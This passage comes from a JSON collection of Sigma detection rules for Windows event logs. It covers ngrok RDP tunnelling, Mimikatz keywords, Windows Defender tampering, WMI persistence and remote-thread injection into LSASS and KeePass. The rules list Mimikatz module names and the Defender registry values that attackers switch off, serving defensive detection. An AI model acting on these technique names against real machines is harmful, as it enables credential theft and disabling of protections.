Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml",
    "content": "title: Ngrok Usage with Remote Desktop Service\nid: 64d51a51-32a6-49f0-9f3d-17e34d640272\nstatus: test\ndescription: Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour\nreferences:\n    - https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg\n    - https://ngrok.com/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-29\ntags:\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    product: windows\n    service: terminalservices-localsessionmanager\ndetection:\n    selection:\n        EventID: 21\n        Address|contains: '16777216'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/win_alert_mimikatz_keywords.yml",
    "content": "title: Mimikatz Use\nid: 06d71506-7beb-4f22-8888-e2e5e2ca7fd8\nstatus: test\ndescription: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)\nreferences:\n    - https://tools.thehacker.recipes/mimikatz/modules\nauthor: Florian Roth (Nextron Systems), David ANDRE (additional keywords)\ndate: 2017-01-10\nmodified: 2022-01-05\ntags:\n    - attack.s0002\n    - attack.lateral-movement\n    - attack.credential-access\n    - car.2013-07-001\n    - car.2019-04-004\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.001\n    - attack.t1003.006\nlogsource:\n    product: windows\ndetection:\n    keywords:\n        - 'dpapi::masterkey'\n        - 'eo.oe.kiwi'\n        - 'event::clear'\n        - 'event::drop'\n        - 'gentilkiwi.com'\n        - 'kerberos::golden'\n        - 'kerberos::ptc'\n        - 'kerberos::ptt'\n        - 'kerberos::tgt'\n        - 'Kiwi Legit Printer'\n        - 'lsadump::'\n        - 'mimidrv.sys'\n        - '\\mimilib.dll'\n        - 'misc::printnightmare'\n        - 'misc::shadowcopies'\n        - 'misc::skeleton'\n        - 'privilege::backup'\n        - 'privilege::debug'\n        - 'privilege::driver'\n        - 'sekurlsa::'\n    filter:\n        EventID: 15  # Sysmon's FileStream Events (could cause false positives when Sigma rules get copied on/to a system)\n    condition: keywords and not filter\nfalsepositives:\n    - Naughty administrators\n    - AV Signature updates\n    - Files with Mimikatz in their filename\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_antimalware_platform_expired.yml",
    "content": "title: Windows Defender Grace Period Expired\nid: 360a1340-398a-46b6-8d06-99b905dc69d2\nrelated:\n    - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62\n      type: obsolete\nstatus: stable\ndescription: |\n    Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5101\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/\nauthor: Ján Trenčanský, frack113\ndate: 2020-07-28\nmodified: 2023-11-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5101 # The antimalware platform is expired.\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_asr_lsass_access.yml",
    "content": "title: LSASS Access Detected via Attack Surface Reduction\nid: a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98\nstatus: test\ndescription: Detects Access to LSASS Process\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction\nauthor: Markus Neis\ndate: 2018-08-26\nmodified: 2022-08-13\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    service: windefend\n    definition: 'Requirements:Enabled Block credential stealing from the Windows local security authority subsystem (lsass.exe) from Attack Surface Reduction (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2)'\ndetection:\n    selection:\n        EventID: 1121\n        Path|endswith: '\\lsass.exe'\n    filter_thor:\n        ProcessName|startswith: 'C:\\Windows\\Temp\\asgard2-agent\\'\n        ProcessName|endswith:\n            - '\\thor64.exe'\n            - '\\thor.exe'\n    filter_exact:\n        ProcessName:\n            - 'C:\\Windows\\System32\\atiesrxx.exe'\n            - 'C:\\Windows\\System32\\CompatTelRunner.exe'\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\Windows\\System32\\nvwmi64.exe'\n            - 'C:\\Windows\\System32\\svchost.exe'\n            - 'C:\\Windows\\System32\\Taskmgr.exe'\n            - 'C:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n    filter_begins:\n        ProcessName|startswith:\n            - 'C:\\Windows\\System32\\DriverStore\\'\n            - 'C:\\WINDOWS\\Installer\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Google Chrome GoogleUpdate.exe\n    - Some Taskmgr.exe related activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_asr_psexec_wmi.yml",
    "content": "title: PSExec and WMI Process Creations Block\nid: 97b9ce1e-c5ab-11ea-87d0-0242ac130003\nstatus: test\ndescription: Detects blocking of process creations originating from PSExec and WMI commands\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-process-creations-originating-from-psexec-and-wmi-commands\n    - https://twitter.com/duff22b/status/1280166329660497920\nauthor: Bhabesh Raj\ndate: 2020-07-14\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1047\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: windefend\n    definition: 'Requirements:Enabled Block process creations originating from PSExec and WMI commands from Attack Surface Reduction (GUID: d1e49aac-8f56-4280-b9ba-993a6d77406c)'\ndetection:\n    selection:\n        EventID: 1121\n        ProcessName|endswith:\n            - '\\wmiprvse.exe'\n            - '\\psexesvc.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_config_change_exclusion_added.yml",
    "content": "title: Windows Defender Exclusions Added\nid: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f\nstatus: stable\ndescription: Detects the Setting of Windows Defender Exclusions\nreferences:\n    - https://twitter.com/_nullbind/status/1204923340810543109\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-07-06\nmodified: 2022-12-06\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5007 # The antimalware platform configuration changed.\n        NewValue|contains: '\\Microsoft\\Windows Defender\\Exclusions'\n    condition: selection\nfalsepositives:\n    - Administrator actions\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml",
    "content": "title: Windows Defender Exploit Guard Tamper\nid: a3ab73f1-bd46-4319-8f06-4b20d0617886\nstatus: test\ndescription: |\n    Detects when someone is adding or removing applications or folders from exploit guard \"ProtectedFolders\" or \"AllowedApplications\"\nreferences:\n    - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\nmodified: 2022-12-06\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    allowed_apps_key:\n        EventID: 5007 # The antimalware platform configuration changed.\n        NewValue|contains: '\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\AllowedApplications\\'\n    allowed_apps_path:\n        NewValue|contains:\n            # Add more paths you don't allow in your org\n            - '\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\PerfLogs\\'\n            - '\\Windows\\Temp\\'\n    protected_folders:\n        EventID: 5007 # The antimalware platform configuration changed.\n        # This will trigger on any folder removal. If you experience FP's then add another selection with specific paths\n        OldValue|contains: '\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\ProtectedFolders\\'\n    condition: all of allowed_apps* or protected_folders\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_config_change_sample_submission_consent.yml",
    "content": "title: Windows Defender Submit Sample Feature Disabled\nid: 91903aba-1088-42ee-b680-d6d94fe002b0\nrelated:\n    - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f\n      type: similar\n    - id: a3ab73f1-bd46-4319-8f06-4b20d0617886\n      type: similar\n    - id: 801bd44f-ceed-4eb6-887c-11544633c0aa\n      type: similar\nstatus: stable\ndescription: Detects disabling of the \"Automatic Sample Submission\" feature of Windows Defender.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide\n    - https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-06\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5007 # The antimalware platform configuration changed.\n        NewValue|contains: '\\Real-Time Protection\\SubmitSamplesConsent = 0x0'\n    condition: selection\nfalsepositives:\n    - Administrator activity (must be investigated)\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_history_delete.yml",
    "content": "title: Windows Defender Malware Detection History Deletion\nid: 2afe6582-e149-11ea-87d0-0242ac130003\nstatus: test\ndescription: Windows Defender logs when the history of detected infections is deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus\n    - https://web.archive.org/web/20160727113019/https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e\nauthor: Cian Heasley\ndate: 2020-08-13\nmodified: 2023-11-24\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 1013 # The antimalware platform deleted history of malware and other potentially unwanted software.\n    condition: selection\nfalsepositives:\n    - Deletion of Defender malware detections history for legitimate reasons\nlevel: informational\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml",
    "content": "title: Windows Defender Malware And PUA Scanning Disabled\nid: bc275be9-0bec-4d77-8c8f-281a2df6710f\nrelated:\n    - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62\n      type: obsolete\nstatus: stable\ndescription: Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5010\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/\nauthor: Ján Trenčanský, frack113\ndate: 2020-07-28\nmodified: 2023-11-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5010 # Scanning for malware and other potentially unwanted software is disabled.\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_malware_detected_amsi_source.yml",
    "content": "title: Windows Defender AMSI Trigger Detected\nid: ea9bf0fa-edec-4fb8-8b78-b119f2528186\nstatus: stable\ndescription: Detects triggering of AMSI by Windows Defender.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps\nauthor: Bhabesh Raj\ndate: 2020-09-14\nmodified: 2022-12-07\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 1116 # The antimalware platform detected malware or other potentially unwanted software.\n        SourceName: 'AMSI'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_real_time_protection_disabled.yml",
    "content": "title: Windows Defender Real-time Protection Disabled\nid: b28e58e4-2a72-4fae-bdee-0fbe904db642\nrelated:\n    - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62\n      type: obsolete\nstatus: stable\ndescription: |\n    Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initiated this action you might want to reduce it to a \"medium\" level if this occurs too many times in your environment\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5001\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/\nauthor: Ján Trenčanský, frack113\ndate: 2020-07-28\nmodified: 2023-11-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5001 # Real-time protection is disabled.\n    condition: selection\nfalsepositives:\n    - Administrator actions (should be investigated)\n    - Seen being triggered occasionally during Windows 8 Defender Updates\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_real_time_protection_errors.yml",
    "content": "title: Windows Defender Real-Time Protection Failure/Restart\nid: dd80db93-6ec2-4f4c-a017-ad40da6ffe81\nstatus: stable\ndescription: Detects issues with Windows Defender Real-Time Protection features\nreferences:\n    - Internal Research\n    - https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/\n    - https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346 # Contains the list of Feature Names (use for filtering purposes)\nauthor: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock '@securepeacock' (Update)\ndate: 2023-03-28\nmodified: 2023-05-05\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID:\n            - 3002 # Real-Time Protection feature has encountered an error and failed\n            - 3007 # Real-time Protection feature has restarted\n    filter_optional_network_inspection:\n        Feature_Name: '%%886' # Network Inspection System\n        Reason:\n            - '%%892' # The system is missing updates that are required for running Network Inspection System.  Install the required updates and restart the device.\n            - '%%858' # Antimalware security intelligence has stopped functioning for an unknown reason. In some instances, restarting the service may resolve the problem.\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Some crashes can occur sometimes and the event doesn't provide enough information to tune out these cases. Manual exception is required\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml",
    "content": "title: Win Defender Restored Quarantine File\nid: bc92ca75-cd42-4d61-9a37-9d5aa259c88b\nstatus: test\ndescription: Detects the restoration of files from the defender quarantine\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-06\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 1009 # The antimalware platform restored an item from quarantine.\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activity restoring a file\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml",
    "content": "title: Windows Defender Configuration Changes\nid: 801bd44f-ceed-4eb6-887c-11544633c0aa\nrelated:\n    - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f\n      type: similar\n    - id: a3ab73f1-bd46-4319-8f06-4b20d0617886\n      type: similar\n    - id: 91903aba-1088-42ee-b680-d6d94fe002b0\n      type: similar\nstatus: stable\ndescription: Detects suspicious changes to the Windows Defender configuration\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide\n    - https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-06\nmodified: 2023-11-24\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5007 # The antimalware platform configuration changed.\n        NewValue|contains:\n            # TODO: Add more suspicious values\n            - '\\Windows Defender\\DisableAntiSpyware '\n            # - '\\Windows Defender\\Features\\TamperProtection ' # Might produce FP\n            - '\\Windows Defender\\Scan\\DisableRemovableDriveScanning '\n            - '\\Windows Defender\\Scan\\DisableScanningMappedNetworkDrivesForFullScan '\n            - '\\Windows Defender\\SpyNet\\DisableBlockAtFirstSeen '\n            - '\\Real-Time Protection\\SpyNetReporting '\n            # Exclusions changes are covered in 1321dc4e-a1fe-481d-a016-52c45f0c8b4f\n            # Exploit guard changes are covered in a3ab73f1-bd46-4319-8f06-4b20d0617886\n    condition: selection\nfalsepositives:\n    - Administrator activity (must be investigated)\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml",
    "content": "title: Microsoft Defender Tamper Protection Trigger\nid: 49e5bc24-8b86-49f1-b743-535f332c2856\nstatus: stable\ndescription: Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"\nreferences:\n    - https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide\nauthor: Bhabesh Raj, Nasreddine Bencherchali\ndate: 2021-07-05\nmodified: 2022-12-06\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5013 # Tamper protection blocked a change to Microsoft Defender Antivirus. If Tamper protection is enabled then, any attempt to change any of Defender's settings is blocked. Event ID 5013 is generated and states which setting change was blocked.\n        Value|endswith:\n            - '\\Windows Defender\\DisableAntiSpyware'\n            - '\\Windows Defender\\DisableAntiVirus'\n            - '\\Windows Defender\\Scan\\DisableArchiveScanning'\n            - '\\Windows Defender\\Scan\\DisableScanningNetworkFiles'\n            - '\\Real-Time Protection\\DisableRealtimeMonitoring'\n            - '\\Real-Time Protection\\DisableBehaviorMonitoring'\n            - '\\Real-Time Protection\\DisableIOAVProtection'\n            - '\\Real-Time Protection\\DisableScriptScanning'\n    condition: selection\nfalsepositives:\n    - Administrator might try to disable defender features during testing (must be investigated)\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_threat.yml",
    "content": "title: Windows Defender Threat Detected\nid: 57b649ef-ff42-4fb0-8bf6-62da243a1708\nstatus: stable\ndescription: Detects actions taken by Windows Defender malware detection engines\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus\nauthor: Ján Trenčanský\ndate: 2020-07-28\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID:\n            - 1006 # The antimalware engine found malware or other potentially unwanted software.\n            - 1015 # The antimalware platform detected suspicious behavior.\n            - 1116 # The antimalware platform detected malware or other potentially unwanted software.\n            - 1117 # he antimalware platform performed an action to protect your system from malware or other potentially unwanted software.\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_virus_scan_disabled.yml",
    "content": "title: Windows Defender Virus Scanning Feature Disabled\nid: 686c0b4b-9dd3-4847-9077-d6c1bbe36fcb\nrelated:\n    - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62\n      type: obsolete\nstatus: stable\ndescription: Detects disabling of the Windows Defender virus scanning feature\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5012\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/\nauthor: Ján Trenčanský, frack113\ndate: 2020-07-28\nmodified: 2023-11-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5012 # Scanning for viruses is disabled.\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/wmi/win_wmi_persistence.yml",
    "content": "title: WMI Persistence\nid: 0b7889b4-5577-4521-a60a-3376ee7f9f7b\nstatus: test\ndescription: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.\nreferences:\n    - https://twitter.com/mattifestation/status/899646620148539397\n    - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\nauthor: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community\ndate: 2017-08-22\nmodified: 2022-02-10\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.003\nlogsource:\n    product: windows\n    service: wmi\n    definition: 'WMI Namespaces Auditing and SACL should be configured, EventID 5861 and 5859 detection requires Windows 10, 2012 and higher'\ndetection:\n    wmi_filter_to_consumer_binding:\n        EventID: 5861\n    consumer_keywords:\n        - 'ActiveScriptEventConsumer'\n        - 'CommandLineEventConsumer'\n        - 'CommandLineTemplate'\n        # - 'Binding EventFilter'  # too many false positive with HP Health Driver\n    wmi_filter_registration:\n        EventID: 5859\n    filter_scmevent:\n        Provider: 'SCM Event Provider'\n        Query: 'select * from MSFT_SCMEventLogEvent'\n        User: 'S-1-5-32-544'\n        PossibleCause: 'Permanent'\n    condition: ( (wmi_filter_to_consumer_binding and consumer_keywords) or (wmi_filter_registration) ) and not filter_scmevent\nfalsepositives:\n    - Unknown (data set is too small; further testing needed)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml",
    "content": "title: HackTool - CACTUSTORCH Remote Thread Creation\nid: 2e4e488a-6164-4811-9ea1-f960c7359c40\nstatus: test\ndescription: Detects remote thread creation from CACTUSTORCH as described in references.\nreferences:\n    - https://twitter.com/SBousseaden/status/1090588499517079552 # Deleted\n    - https://github.com/mdsecactivebreach/CACTUSTORCH\nauthor: '@SBousseaden (detection), Thomas Patzke (rule)'\ndate: 2019-02-01\nmodified: 2023-05-05\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1055.012\n    - attack.t1059.005\n    - attack.t1059.007\n    - attack.t1218.005\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\System32\\cscript.exe'\n            - '\\System32\\wscript.exe'\n            - '\\System32\\mshta.exe'\n            - '\\winword.exe'\n            - '\\excel.exe'\n        TargetImage|contains: '\\SysWOW64\\'\n        StartModule: null\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml",
    "content": "title: HackTool - Potential CobaltStrike Process Injection\nid: 6309645e-122d-4c5b-bb2b-22e4f9c2fa42\nstatus: test\ndescription: Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons\nreferences:\n    - https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f\n    - https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/\nauthor: Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community\ndate: 2018-11-30\nmodified: 2023-05-05\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055.001\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        StartAddress|endswith:\n            - '0B80'\n            - '0C7C'\n            - '0C88'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_keepass.yml",
    "content": "title: Remote Thread Created In KeePass.EXE\nid: 77564cc2-7382-438b-a7f6-395c2ae53b9a\nstatus: test\ndescription: Detects remote thread creation in \"KeePass.exe\" which could indicates potential password dumping activity\nreferences:\n    - https://www.cisa.gov/uscert/ncas/alerts/aa20-259a\n    - https://github.com/denandz/KeeFarce\n    - https://github.com/GhostPack/KeeThief\nauthor: Timon Hackenjos\ndate: 2022-04-22\nmodified: 2023-05-05\ntags:\n    - attack.credential-access\n    - attack.t1555.005\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        TargetImage|endswith: '\\KeePass.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml",
    "content": "title: Remote Thread Creation In Mstsc.Exe From Suspicious Location\nid: c0aac16a-b1e7-4330-bab0-3c27bb4987c7\nstatus: test\ndescription: |\n    Detects remote thread creation in the \"mstsc.exe\" process by a process located in a potentially suspicious location.\n    This technique is often used by attackers in order to hook some APIs used by DLLs loaded by \"mstsc.exe\" during RDP authentications in order to steal credentials.\nreferences:\n    - https://github.com/S12cybersecurity/RDPCredentialStealer/blob/1b8947cdd065a06c1b62e80967d3c7af895fcfed/APIHookInjectorBin/APIHookInjectorBin/Inject.h#L25\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-28\nmodified: 2024-01-22\ntags:\n    - attack.credential-access\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        TargetImage|endswith: '\\mstsc.exe'\n        SourceImage|contains:\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\PerfLogs\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_powershell_lsass.yml",
    "content": "title: Potential Credential Dumping Attempt Via PowerShell Remote Thread\nid: fb656378-f909-47c1-8747-278bf09f4f4f\nrelated:\n    - id: 3f07b9d1-2082-4c56-9277-613a621983cc\n      type: obsolete\n    - id: 0f920ebe-7aea-4c54-b202-9aa0c609cfe5\n      type: similar\nstatus: test\ndescription: Detects remote thread creation by PowerShell processes into \"lsass.exe\"\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020-10-06\nmodified: 2022-12-18\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetImage|endswith: '\\lsass.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml",
    "content": "title: Remote Thread Creation Via PowerShell In Uncommon Target\nid: 99b97608-3e21-4bfe-8217-2a127c396a0e\nrelated:\n    - id: eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50\n      type: similar\nstatus: test\ndescription: Detects the creation of a remote thread from a Powershell process in an uncommon target process\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-06-25\nmodified: 2023-11-10\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.011\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetImage|endswith:\n            # Note: Please add additional potential interesting targets to increase coverage\n            - '\\rundll32.exe'\n            - '\\regsvr32.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_password_dumper_lsass.yml",
    "content": "title: Password Dumper Remote Thread in LSASS\nid: f239b326-2f41-4d6b-9dfa-c846a60ef505\nstatus: stable\ndescription: |\n    Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\n    The process in field Process is the malicious program. A single execution can lead to hundreds of events.\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm\nauthor: Thomas Patzke\ndate: 2017-02-19\nmodified: 2021-06-21\ntags:\n    - attack.credential-access\n    - attack.s0005\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        StartModule: ''\n    condition: selection\nfalsepositives:\n    - Antivirus products\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_relevant_source_image.yml",
